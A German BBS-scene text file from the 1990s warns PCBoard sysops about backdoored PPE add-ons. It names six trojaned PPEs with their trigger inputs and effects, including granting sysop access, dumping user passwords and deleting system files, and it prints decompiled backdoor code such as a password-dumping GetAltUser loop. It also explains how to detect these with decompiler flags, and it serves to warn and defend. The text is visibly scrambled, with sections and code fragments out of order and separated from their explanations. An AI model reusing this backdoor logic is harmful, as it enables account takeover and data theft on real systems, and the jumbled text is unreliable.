EIN TEXT VON Bad Peon
-1. | VORWORT | Bla |
0. | INHALTSVERZEICHNIS | Hä?! |
1. | BACKDOORS IN PPES | Sechs konkrete Beispiele |
2. | WIE MAN SICH VOR BACKDOORS SCHÜTZT | Erkennen und vernichten! |
3. | EIN AUSBLICK IN DIE ZUKUNFT | PPLC 3.40 suckt! |
4. | WAS IST MIT CDC LOS? | Haste ma ne Mark? |
5. | DIES UND DAS UND IRGENDWAS | Greetings und Welteroberungspläne |
Sollte ein U_PWD bemängelt worden sein, sucht man danach; wenn davor ein
'GetUser' steht ist es (meistens) harmlos, da es nur das Password des
derzeitigen Users enthält. Steht davor allerdings ein 'GetAltUser', so
liest die PPE das Passwort/die Passwörter anderer User.
Ein Beispiel aus der WAVLOGOF.PPE:
For INTEGER004 = 1 To 10
For/Next sorgt dafür, dass alles, was dazwischen steht, mit jedem
INTEGER004 von 1 bis 10 abgearbeitet wird. In diesem Fall werden also die
Daten des Users Nummer 1-10 geladen, eine Leerzeile wird ans Modem geschickt
(wir wollen ja schliesslich auch komfortable und ordentlich aussehende
Backdoors!), dann wird das More?-Prompt deaktiviert (einmal hätte auch
gereicht, müsste nicht in der Schleife stehen), dann wird der Name
des Users ausgeben, dann sein Passwort und eine weitere Leerzeile später
geht das ganze mit dem nächsten User weiter.
Ein User, der dieses Backdoor benutzt, sieht dann etwa folgendes:
BAD PEON
Wenn es in dem Board gar keinen Userlevel 110 gibt, dann gibt PC Board
nur eine Fehlermeldung aus und schreibt die Userdaten gar nicht erst
in die Userbase.
Bessere Backdoors sehen da eher so aus (IFLAG.PPE):
GetUser
Sie wird natürlich NICHT abwärtskompatibel sein, d.h.: Ältere PC Boards
können mit PPEs, die mit PPLC 3.40 kompeliert wurden, nichts anfangen,
aber das war ja noch nie so.
Zusätzlich enthält PPLC 3.40 neue Routinen zur Verschlüsselung, die
laut CDC das Dekompilieren für immer unmöglich machen werden.
PPEs, die mit PPLC 3.40 kompeliert wurden, können mit KEINEM heute
existenten Programm dekompiliert werden! Eine neue Flut von Backdoors
rollt also auf uns zu, und wir haben keine Möglichkeit, etwas dagegen
zu unternehmen.
Lone Runner^AGS (PPLX) und Chicken^T4F (PPLD) haben damit mal wieder ein
hartes Stück Arbeit vor sich... Aber keine Sorge Jungs, ewiger Weltruhm
ist euch sicher! ;)
Aber wenn man das ganze (ausnahmsweise) mal von einem objektiven Standpunkt
betrachtet, so stellt man fest:
PPEs, die mit PPLC 3.40 kompiliert wurden...
Daher würde ich es als PPE-Coder nicht für sehr sinnvoll halten, meine
PPEs mit PPLC 3.40 zu kompelieren, weil sonst jeder Angst vor einem
möglichen Backdoor hat und nichts unternehmen kann, um dieses Risiko zu
minimieren.
Wenn ihr eine Underground Empire-PPE findet, die mit PPLC 3.40 kompeliert
wurde, die neuer als die übrigen Files im Archiv ist, deren Datum
nicht mit dem im -UE-REL-.NFO übereinstimmt oder die sonstwie einen
merkwürdigen Eindruck macht, dann installiert es nicht sondern schickt es
uns! Bis jetzt sind zwar noch keine gehackten Versionen von UE-PPEs
aufgetaucht, aber einmal ist immer das erste mal. ;(
Natürlich weiss ich, dass es genug Leute gibt, die sich den Code "einfach
so" anschauen bzw. gerade selber eine ähnliche PPE schreiben ;)
Aber was spricht dagegen, sich anzusehen, wie andere Leute ein bestimmtes
Problem gelöst haben?? Das ganze hört für mich genau dann auf, wenn ganze
Passagen einer dekompilierten PPE in eine neue, "eigene" PPE kopiert und
nur noch die Namen der Variablen angepasst werden. Das ist dann nicht
mehr Inspiration, sondern dumpfes Abschreiben!
WARUM HAT CDC WAS GEGEN DECOMPILER?
Allerdings versucht der harte Kern von CDC, Wege zu finden, um das
Geschäft nicht komplett aufgeben zu müssen, da sie mit PC Board Metaworlds
ja ein zukunftsträchtiges Programm haben, dass nur deswegen kein Geld
bringt, weil es noch nicht 100%ig ausgereift ist und weil CDC schlicht
kein Geld hat, um Werbung dafür zu machen.
PC Board selbst lässt sich im Zeitalter der Völkerwanderung ins Internet
ja kaum noch verkaufen, CDC hat das zu spät erkannt und daher haben sie
jetzt Probleme, zu überleben.
Wir werden trotzdem weiterhin PPEs entwickeln und die meisten Sysops
werden auch nicht sofort ihre Boards wegschmeissen, nur weil es in der
nächsten Zeit keine Updates mehr für PC Board geben wird... viele Sysops
benutzen ja z.B. immer noch PC Board 15.22, obwohl schon 2 neuere
Versionen da sind, nämlich 15.3 und 15.4beta.
ACE ARUU, HANDO und THE EXORCIST, die einige Bugs im derzeit laufenden
Beta-Test für einige PPEs (u.a. UE!WHO v2.0) gefunden haben, THE MIGHTY
SCI, der so nett ist, für die Defizite eines ganz bestimmten Ex-UE-Members
einzuspringen, ALLY605, der etwas glücklos ein PC Board mit allem,
was man so braucht, laufen hat ohne dass es jemand bemerken würde, JOSEF,
dessen "Gilde Szene Beobachter" sich eigentlich nur um uns dreht, CYZ,
der es immer noch nicht geschafft hat, mich wieder in sein Board zu lassen,
TIGER, der vor Objektivität nur so strotzende UE-Kritiker von VDO,
HEADBANGER, von dem ich endlich alle persönlichen Daten habe, FEAR
FACTORY, die wohl bald die Charts erstürmen werden, VENOM, ohne die es
keinen Trash, Death, Black oder sonstwas-Metal geben würde, SLAYER, die
hoffentlich wieder zu ihrer alten Klasse zurückfinden, DOC FRED, dessen
Mörder freien Download in allen UE-Boards bekommt, MANIAC, dessen Board
total vergammelt, ALLE USER DER WESTERN ALLIANCE, die jeden Upload für
eine persönliche Opferung halten, ALLE LAMER DER 09 AREA, die anscheinend
aus allen anderen Areas rausgeschmissen wurden, MARIA UND JOSEF, deren
Sohn ziemlich kaputt ist und sich für JESUS hält, SUICIDAL SNOWMAN UND
WHITE TRASH, die sich pausenlos gegenseitig vergewaltigen und nebenbei
noch die gesamte US-ANSI-Szene durch den Dreck ziehen, HGH, die uns
immerhin auch mal gegreetet haben und eigentlich ganz ok waren, LORD
XEEN, dessen PPEs bis heute unkopiert sind und dessen griechischer Dealer
immer noch tot ist, DIR, dass du diesen Schmontz liest und ALLE SYSOPS,
dass sie sich auch mal Sorgen um ihre Boardsoftware machen. :)
Aja... diese Beispiele sind nicht alle 100% aktuell, aber die meisten
Sysops werfen PPEs nicht einfach weg, bloss weil sie alt sind... es ist
also gut möglich, dass der einer oder andere seit Monaten in seinem
Board PPEs mit Backdoors laufen hat... :)
TITEL : Intense Flag vO.8
GROUP : CIA - Creators of Insane Art
ARCHIVNAME : CIAFLG08.ZIP
PPE-FILENAME: IFLAG.PPE
HERKUNFT : N/A
FILE_ID.DIZ :
.c!a. ° ÜÜÜÜ Ü²ßßÛÜ
ÜÜܲ ܲÛÛܲßÛ ° ß ß²ß
ÜÜÛÛÛÛܲßÜ ° ßÛÛÛÛ²ß ÜܲÜÛÛÜÜ Ü ß
ßÛÛÝ ÜܲÛÛ Ü ßß ° ß²Ûß޲ܲ * ß
° ÞÛÛ XXßßßß² ߲ܲ ± ° ß °ÞÛÝ Ü
²Ü ²ÛÝ° ÜÛÛ²ÜÜ ßÛÛÜÝÜ ÜÛÛÛÛÛÜÛ² ÜÜÜ Þ²
ÛÛ ÝßÛÜ ÛÛÛÝß² ÛÛß²Ü ²ÛÛß ßÛÛÝ Û²ß Û
ß²ßÛÛÛÛÛÜßß ²Ûßß° ß²ÛÛÜÛß²Ü *Ü ß
Ü*ß Ü ÜÜÜÛ ² ܲÛÜÜ ßßßßß Ü
² * Ü ÜÛ²ß ßßßÛ²Ü Ü*ß ß
ß ß ßßß . . ßßß ²ß *Ü ß
[===(07/15/95)=============================]
Intense Flag vO.8 by Dark Jester [PPE]
For PCB 15.21+ ONLY! A NEW FLAG PPE more
like the PiPELiNE interface!
Aktivierung durch: Eingabe von "iA!"
Effekt : Gibt dem User Sysop-Security.
TITEL : Press Enter.PPE
GROUP : DC - Dark Community
ARCHIVNAME : DC-ENTER.ZIP
PPE-FILENAME: ENTER.PPE
HERKUNFT : Ultra lame, also wahrscheinlich von den Autoren selbst.
FILE_ID.DIZ :
+++DARK COMMUNITY+++
| PRESS ENTER.PPE |
| IMPORTANT FOR ALL |
| SYSOPS!!! |
| READ DC.NFO FILE |
| TO GET A PRESENT |
|-------------------|
| [05/03/97] |
Aktivierung durch: Eingabe von "!"
Effekt : Gibt die Namen und Passwörter der ersten zehn Benutzer
des Sytems (also u.a. auch des Sysops) ans Modem aus,
nicht aber an den lokalen Screen!
TITEL : Menu Command
GROUP : A.R Team
ARCHIVNAME : N/A
PPE-FILENAME: MPROMPT.PPE
HERKUNFT : Anscheinend gerippt, mit Backdoor versehen und rereleaset.
FILE_ID.DIZ :
¬« A GREAT NEW PPE FROM A.R TEAM «¬
¬¬ MENU COMMAND! FADING, PALETTE ¬¬
«¬ CHANGING, DELAY CFG.. 100% CFG! ¬«
¬« GREAT NEW PPE !!! TAKE'T NOW! «¬
Aktivierung durch: Eingabe von "FFF1"
Effekt : Gibt dem User Sysop-Security.
TITEL : Energy Meter Logoff Prompt
GROUP : Ako/Cpc ??
ARCHIVNAME : WAVLOGOF.ZIP
PPE-FILENAME: WAVLOGOF.PPE
HERKUNFT : Ultra lame, also wahrscheinlich von den Autoren selbst.
FILE_ID.DIZ :
ÉÍ-ù* ENERGY METER LOGOFF PROMPT --ÍÍ»
º PPE- To Replace the Cheesy PCB default º
º "Proceed with logoff" prompt. This has º
º LIGHT BAR and COOL ANIMATIONS (which isº
º rare in PPEs) this is a MUST TRY!!!! º
ÈÍÍÍ--ùùúúPeeHS KcaLB [01/04/96] =AKo= ù-¼
Aktivierung durch: Drücken von "*" nach dem Wählen von "USE RESERVES".
Effekt : Gibt dem User Userlevel 110 (Standartvorgabe für
Sysoplevel). Das funktioniert nur, wenn es im PWRD-
File diesen Userlevel auch gibt.
TITEL : Protocol Select Replacement
GROUP : Gilden
ARCHIVNAME : N/A
PPE-FILENAME: N/A
HERKUNFT : Fake: einfach Version v2.0 mit nem Backdoor drin.
FILE_ID.DIZ :
-*( PROTOCOL SELECT REPLACEMENT )*-»
É-Í- ÜÛÛÛÛÛÛÛÛÛ ÛÛÛÛ -- ßÛÛÛÛßßÛÛÛÜ ---
º °± ÛÛÛÛ ÜÜÜÜÜ ÛÛÛÛ ±±± ÛÛÛÛ ÛÛÛÛ ±° º
°± ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛ ÛÛÛÛ ±°
º °± ÛÛÛÛÜÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛ ÛÛÛÛ ±° º
--- ßßßßßßÛÛÛÛ ßßßßßÛÛÛÛ ßßßßßßßß -Í-ͼ
*NiCE CURSOR iNTERFACE
*FULLY CONFiGURABLE (v2.1)
*MiNOR BUGFiX (PANDUR/GLD) º
ÈÍÍ-ÍÍ--Í---Í-------Í----(13/o1/96)--
Aktivierung durch: N/A
Effekt : Gibt dem User Sysop-Security.
TITEL : Oneliner v.1
GROUP : Independent: Black Night
ARCHIVNAME : BK-ONEL.ZIP oder BK!ONEL.ZIP
PPE-FILENAME: ONELINER.PPE
HERKUNFT : Ein Fake, der NICHT von Black Night stammt.
Entdeckt von The Mighty SCI!, Cyz und Co.
FILE_ID.DIZ :
ÛßßßßßßßßßßßßßßßßßßßßßßßßßÛ
Û ²ÛÛßÛÛÛ ²ÛÛßÛÛÛ ÛÛÛßÛÛÛ Û
² ²ÛÛ ÜÜÜ ²ÛÛ ÜÜÜ ÛÛÛßßß Û
Û ßßßßßßß ßßß ßßß ßßßßßßß Û
Û LiNeR V.1 Û
ÞßßßßßßßßßßßßßßßßßßßßßßßßßÝ
Þúúúúúúúúúúúúúúúúúúúúúúúú Ý
ÞúúCODEDúBYúBLACKúKNIGHTúúÝ
²ÛÜßÜÜßÜÜßÜßÜßÜßÜÜßÜßÜßÜßܲ
Ein echtes "Meisterwerk", über das wir schon einmal berichtet haben (in
UE-00074), aber mittlerweile haben wir genauere Infos darüber. Diese PPE
enthält gleich mehrere Backdoors:
1.
Aktivierung durch: Starten der PPE
Effekt : Kopiert die Userbase und moved sie unter drei anderen
Namen (THCHNO.ZIP, THBSHTBV.TXT, JANK.ZIP) ins Down-
load-Verzeichnis der Main Board-Konferenz und trägt
sie auch gleich in die Downloadliste ein.
Zum downloaden muss man "flag [name]" tippen, weil die
Files ja nicht in den Filelisten landen.
2.
Aktivierung durch: Location des Users ist "bye bye".
Effekt : Löscht folgende Files:
c:\autoexec.bat
c:\autoexec.bak
c:\config.sys
c:\config.sys Ein Bug :)
c:\command.com
c:\dos\command.com
Die folgenden Files werden auch gleich aufgespürt und
selbstverständlich ebenfalls gekillt:
USERS
CNAMES
DLPATHS.LST (der Main Board-Konferenz)
PCBOARD.DAT
Achja... da hier das DELETE-Kommando von PC Board be-
nutzt wird, sollte es nicht weiter schwer sein, diese
Files mittels einer Bootdiskette und UNDELETE wieder-
herzustellen. Übringens wird das DELETE-Kommando NICHT
von PPLX 2.00 angekreidet!
3.
Aktivierung durch: Location des Users ist "chicken man".
Effekt : Gibt dem User Sysop-Security.
4.
Aktivierung durch: In Zeile 32 von ONELINER.CFG steht "backdoor off".
Effekt : Löscht die drei Kopien der Userbase wieder.
So... wie wir gesehen haben, werden Backdoors für gewöhnlich durch Ein-
gaben des Users aktiviert und dienen zum Erreichen der höchstmöglichen
Userlevels bzw. zum Zugriff auf fremde (bessere) Accounts.
Man dekompiliert einfach die fragwürdige PPE mit PPLX 2.00 und achtet dabei
auf die "Decompiling Flags", die PPLX vergibt, wenn bestimmte verdächtige
Funktionen in einer PPE vorkommen. Dann sieht man sich das erzeugte
PPX-File an und scrollt erst mal ganz an den Schluss, wo die Flags
mit ihren Erklärungen stehen. Anschliesend sucht man (vom Anfang des
Files an!) nach den Statements, die PPLX dort aufgeführt hat.
GetAltUser INTEGER004
MPrintLn
MPrint "@POFF@"
MPrintLn U_Name()
MPrintLn U_Pwd
MPrintLn
Next
ASDFLKHSDMYVCOI
THE MIGHTY SCI
7328984a7w876
OMEN
LINUXRULES
M0!
S*D.S}8ßèFS^-D%F!/&|%·ÕïS(SD=äõ,Sæ'Dý5²4øS$D#ƒ_*2`sJDòÄÉß;)ü?[Ü@A
(usw., hab hier keinen Bock 40 Zeilen für ein Beispiel zu opfern)
Ein PUTUSER bedeutet, dass die Userdaten des derzeitigen Users neu geschrieben
werden, d.h. in der Regel verändert wurden. Hierbei sollte man nach einem
U_SEC suchen, dass vor einem = steht, wie z.B. in dieser Zeilenfolge aus der
WAVLOGOF.PPE:
GetUser
U_Sec = 110
PutUser
GetUser liest die Userdaten, U_Sec = 110 setzt den Userlevel auf 110 und
PutUser speichert dann die Userdaten. Ob der User in diesem Fall tatsächlich
Sysop-Privilegien geniest hängt davon ab, ob der Sysop die voreingestellten
Werte für die Sysop-Funktionen hochgesetzt hat oder nicht, aber die meisten
Sysops arbeiten einfach mit der Standart-Konfiguration von PC Board... selber
schuld!
U_Sec = ReadLine(PCBDat(), 16)
PutUser
Hier wird der neue Userlevel des Users auf den Wert gesetzt, der in der
PCBOARD.DAT in der Zeile 16 vermerkt ist, und das ist genau der Wert, der
zur "Users File Maintainance" erforderlich, also bei jedem halbwegs
vernünftigen Sysop der höchste Userlevel überhaupt (damit kann man Userdaten
ausspähen und verändern). Daher wird diese PPE dem User in jedem Board den
maximalen Userlevel geben, auch wenn der Sysop die Konfiguration komplett
umgekrempelt hat. Gut nich? :)
Mit PC Board 15.4 kommt, wie an den Beta-Versionen zu sehen war, mal
wieder eine neue Version von PPLC, nämlich 3.40.
-sind maximal 0.1% kleiner im Vergleich zu PPLC 3.30,
-benötigen länger, um von PC Board entschlüsselt zu werden,
-erzielen wegen der Verschlüsselung noch schlechtere Pack-Raten,
-laufen nur auf PC Board 15.4,
-sind IMMER verdächtig, Backdoors zu enthalten,
-und sind daher ein absolut tödliches Risiko für jeden Sysop!
Deshalb werden bis auf weiters (also etwa bis PPLX/PPLD mit PPLC 3.40 umgehen
können) alle PPEs von Underground Empire nicht mit PPLC 3.40 kompeliert!
Noch ein Wort zum Dekompilieren im allgemeinen:
Ich benutze keine Decompiler-Traps, weil ich finde, dass jeder die
Möglichkeit haben sollte, sich den Code einer PPE anzusehen, um
herauszufinden, was sie eigentlich so treibt.
Ausserdem kann das Rekompilieren die einzige Möglichkeit sein, die PPE
an sein Board anzupassen, falls die Configfiles nicht umfassend genug
ausfallen sollten.
Guckt euch mal die Preisliste von CDC an :) Auch wenn sie ihre Preise
erheblich gesenkt haben, so bleibt PC Board ein Profi-Programm, an dem auch
andere Firmen etwas verdienen wollen, indem sie z.B. Shareware-PPEs mit
eingeschränktem Funktionsumfang rausbringen, die dann sofort gecrackt
werden.
Wie wir inzwischen erfahren haben, ist die Firma CDC mittlerweile PLEITE
und es sieht so aus, als würden sämtliche Angestellte arbeitslos und der
gesamte Firmenbesitz verschachert werden.
Ich grüsse:
Noch was:
Wie allgemein zu Vernehmen ist, sind eine ganze Menge Sysops derzeit
damit beschäftigt, sehnsüchtig auf einen Nachfolger für die Standart-
PPE FLAG.PPE von PWA zu warten... nur noch wenige Monate!
Aja genau: Greets an Xtreeman & Synopsis! ;)
CYA... I AM BAD PEON!